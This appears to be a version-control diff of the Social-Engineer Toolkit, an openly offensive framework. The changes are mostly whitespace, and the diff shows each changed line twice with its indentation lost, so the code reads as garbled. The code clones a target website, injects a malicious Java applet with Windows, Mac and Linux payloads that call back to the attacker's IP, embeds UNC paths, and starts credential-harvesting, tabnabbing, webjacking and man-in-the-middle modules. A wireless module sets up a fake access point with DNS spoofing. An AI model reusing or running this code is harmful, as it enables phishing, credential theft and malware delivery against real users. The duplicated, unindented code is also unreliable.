if java_applet =="on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
# Allow Self-Signed Certificates
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("SELF_SIGNED_APPLET=ON", line)
if match:
sys.path.append("src/html/unsigned/")
import self_sign
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
# Allow Self-Signed Certificates
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("SELF_SIGNED_APPLET=ON", line)
if match:
sys.path.append("src/html/unsigned/")
import self_sign
# start the stuff for metasploit client side
if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
if os.path.isfile("src/program_junk/webdav_enabled"):
webdav_enabled="on"
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
if os.path.isfile("src/program_junk/webdav_enabled"):
webdav_enabled="on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag="off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
# if using man left in the middle
if mlitm == "on":
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
# if using man left in the middle
if mlitm == "on":
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
print_status("\nReport exported.")
return_continue()
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
os.chdir(definepath)
sys.path.append("%s/src/webattack/harvester/" % (definepath))
import report_generator
try:
# a.terminate only works on Python > 2.6
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
print_status("\nReport exported.")
return_continue()

6
src/webattack/profiler/webprofiler.py
View file

@ -6,7 +6,7 @@
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()
print_info("This feature is currently under development and disabled.")
return_continue()
prep_website()

4
src/webattack/tabnabbing/tabnabbing.py
View file

@ -19,7 +19,7 @@ for line in fileopen:
# grab attack_vector specification
fileopen=file("src/program_junk/attack_vector", "r")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector=line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking="off"
@ -30,7 +30,7 @@ if os.path.isfile("src/program_junk/multi_webjacking"):
# Open the IPADDR file
ipaddr=""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen=file("src/program_junk/site.template","r").readlines()

310
src/webattack/web_clone/cloner.py
View file

@ -10,7 +10,7 @@ import sys
import time
import re
import shutil
import urllib2
import urllib2
operating_system = check_os()
definepath=os.getcwd()
@ -28,10 +28,10 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
## Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
## Define base value
site_cloned = True
@ -41,7 +41,7 @@ meterpreter_iframe="8080"
## make dir if needed
if not os.path.isdir("src/program_junk/web_clone/"):
os.makedirs("src/program_junk/web_clone")
os.makedirs("src/program_junk/web_clone")
## if we used a proxy configuration from the set-proxy
if os.path.isfile("src/program_junk/proxy.confg"):
@ -120,41 +120,41 @@ try:
## clean up old stuff
## set counter
counter=0
# try except block in case no internet connection, route to Internet, etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
# try except block in case no internet connection, route to Internet, etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
if wget == 1:
subprocess.Popen('%s;cd src/program_junk/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" %s;' % (proxy_config,user_agent,url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 1:
subprocess.Popen('%s;cd src/program_junk/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" %s;' % (proxy_config,user_agent,url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 0:
# if we don't have wget installed we will use python to rip, not as good as wget
headers = { 'User-Agent' : user_agent }
# read in the websites
req = urllib2.Request(url, None, headers)
# read in the data from the initial request
html = urllib2.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file("src/program_junk/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
if wget == 0:
# if we don't have wget installed we will use python to rip, not as good as wget
headers = { 'User-Agent' : user_agent }
# read in the websites
req = urllib2.Request(url, None, headers)
# read in the data from the initial request
html = urllib2.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file("src/program_junk/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
# if it failed ;(
except:
pass
# if it failed ;(
except:
pass
## If the website did not clone properly, exit out.
if not os.path.isfile("src/program_junk/web_clone/index.html"):
@ -166,21 +166,21 @@ try:
filewrite.write("failed")
filewrite.close()
if os.path.isfile("src/program_junk/web_clone/index.html"):
fileopen = file("src/program_junk/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC
return_continue()
site_cloned = False
os.remove("src/program_junk/web_clone/index.html")
if os.path.isfile("src/program_junk/web_clone/index.html"):
fileopen = file("src/program_junk/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC
return_continue()
site_cloned = False
os.remove("src/program_junk/web_clone/index.html")
## add file to let set interactive shell know it was unsuccessful
filewrite=file("src/program_junk/cloner.failed" , "w")
filewrite.write("failed")
filewrite.close()
## add file to let set interactive shell know it was unsuccessful
filewrite=file("src/program_junk/cloner.failed" , "w")
filewrite.write("failed")
filewrite.close()
if site_cloned == True:
@ -190,25 +190,25 @@ try:
if site_cloned == True:
# if we specify UNC embedding
if unc_embed == True:
fileopen=file("src/program_junk/web_clone/index.html","r")
index_database = fileopen.read()
filewrite = file("src/program_junk/web_clone/index.html", "w")
## Open the UNC EMBED
fileopen4=file("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)
# if we specify UNC embedding
if unc_embed == True:
fileopen=file("src/program_junk/web_clone/index.html","r")
index_database = fileopen.read()
filewrite = file("src/program_junk/web_clone/index.html", "w")
filewrite.write(index_database)
filewrite.close()
## Open the UNC EMBED
fileopen4=file("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + unc_database, index_database)
filewrite.write(index_database)
filewrite.close()
## java applet attack vector
@ -218,105 +218,105 @@ try:
multi_java=True
if attack_vector == "java" or multi_java:
## Here we parse through the new website and add our java applet code, its a hack for now
## Wrote this on the plane to Russia, easiest way to do this without internet access :P
print bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC
## Read in newly created index.html
time.sleep(2)
if not os.path.isfile("src/program_junk/web_clone/index.html"):
## trigger error that we were unable to grab the website :(
print_error("Unable to clone the website it appears. Email us to fix.")
sys.exit()
## Here we parse through the new website and add our java applet code, its a hack for now
## Wrote this on the plane to Russia, easiest way to do this without internet access :P
print bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC
## Read in newly created index.html
time.sleep(2)
if not os.path.isfile("src/program_junk/web_clone/index.html"):
## trigger error that we were unable to grab the website :(
print_error("Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen=file("src/program_junk/web_clone/index.html","r")
## Read add-on for java applet
fileopen2=file("src/webattack/web_clone/applet.database" , "r")
## Write to new file with java applet added
filewrite=file("src/program_junk/web_clone/index.html.new", "w")
fileopen3=file("src/webattack/web_clone/repeater.database", "r")
fileopen=file("src/program_junk/web_clone/index.html","r")
## Read add-on for java applet
fileopen2=file("src/webattack/web_clone/applet.database" , "r")
## Write to new file with java applet added
filewrite=file("src/program_junk/web_clone/index.html.new", "w")
fileopen3=file("src/webattack/web_clone/repeater.database", "r")
## this is our cloned website
index_database = fileopen.read()
## this is our applet database
applet_database = fileopen2.read()
## this is our repeater database
repeater_database = fileopen3.read()
## this is our cloned website
index_database = fileopen.read()
## this is our applet database
applet_database = fileopen2.read()
## this is our repeater database
repeater_database = fileopen3.read()
## here we begin replacing specifics in order to prep java applet payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" % (rand_gen_win, rand_gen_mac, rand_gen_nix))
## here we begin replacing specifics in order to prep java applet payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" % (rand_gen_win, rand_gen_mac, rand_gen_nix))
## close the file up
applet_database = applet_database.replace("ipaddrhere", ipaddr + ":" + str(web_port))
## close the file up
applet_database = applet_database.replace("ipaddrhere", ipaddr + ":" + str(web_port))
## set the java field
applet_database = applet_database.replace("IDREPLACEHERE", java_id)
## set the java field
applet_database = applet_database.replace("IDREPLACEHERE", java_id)
## set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
## set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
## set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace("IDREPLACEHERE", java_id)
repeater_database = repeater_database.replace("TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace("URLHEREPLZ", url)
## set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace("IDREPLACEHERE", java_id)
repeater_database = repeater_database.replace("TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace("URLHEREPLZ", url)
## do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
## do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet ", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
## confirm we can find body
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
index_database = re.sub("<applet ", repeater_database + "\n<applet ", index_database)
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
## confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace('<param name="9" value=""', '<param name="9" value="%s"' % (url))
## start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub("<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub("<head.*?>", "\n<head>" + repeater_database, index_database)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error("This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error("This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
## write the file out
filewrite.write(index_database)
## write the file out
filewrite.write(index_database)
## close the file after done writing
filewrite.close()
## close the file after done writing
filewrite.close()
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
print bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC
## selection of browser exploits
## check to see if multiattack is in use
@ -329,12 +329,12 @@ try:
## Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile("src/program_junk/web_clone/index.html"): os.remove("src/program_junk/web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile("src/program_junk/web_clone/index.html.new"):
if os.path.isfile("src/program_junk/web_clone/index.html.bak"):
shutil.copyfile("src/program_junk/web_clone/index.html.bak", "src/program_junk/web_clone/index.html.new")
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.copyfile("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile("src/program_junk/web_clone/index.html.new"):
if os.path.isfile("src/program_junk/web_clone/index.html.bak"):
shutil.copyfile("src/program_junk/web_clone/index.html.bak", "src/program_junk/web_clone/index.html.new")
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.copyfile("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/index.html")
time.sleep(1)
fileopen=file("src/program_junk/web_clone/index.html","r").readlines()
filewrite=file("src/program_junk/web_clone/index.html.new", "w")

8
src/wireless/wifiattack.py
View file

@ -20,12 +20,12 @@ from config.set_config import AP_CHANNEL as ap_channel
from config.set_config import DNSSPOOF_PATH as dnsspoof_path
if not os.path.isfile(dnsspoof_path):
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
print_info("using SET's local airbase-ng binary")
print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.")
print_info("""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
@ -72,7 +72,7 @@ if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "":
fakeap_dhcp_menu_choice = "1"